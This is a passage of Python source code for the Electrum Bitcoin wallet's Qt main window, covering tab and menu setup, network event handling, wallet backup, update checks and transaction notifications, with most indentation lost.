QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
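# LN_NUM_PAYMENT_ATTEMPTS caps the number of routing attempts passed to
# lnworker.pay_invoice() when paying a Lightning invoice from this window.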
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
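            # Optional tabs are only added when the corresponding
            # 'show_<name>_tab' config key is set; the metadata stashed on the
            # widget is reused by toggle_tab() and the View menu actions.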
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
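        # Resolve the configured OpenAlias in a background daemon thread and
        # notify the GUI via alias_received_signal when done.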
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether there is anything to
        # announce, since the callback may have fired before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
        except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
        except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
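        # The Bitcoin whitepaper PDF is embedded in the outputs of mainnet
        # transaction 54e48e5f...86e713; fetch that transaction once, strip the
        # output framing from its hex, and cache the reassembled PDF next to the
        # config so it can simply be reopened later.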
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
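        # Drain the queued incoming transactions (skipped while the wallet is
        # still syncing, and rate limited to one batch every 20 seconds) and show
        # either a single aggregated tray message for three or more relevant
        # transactions or one message per transaction.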
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
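        # Keep the BTC and fiat amount edits in sync: editing one recomputes the
        # other from the current exchange rate, with the 'follows' flag guarding
        # against the textChanged handlers re-triggering each other.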
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
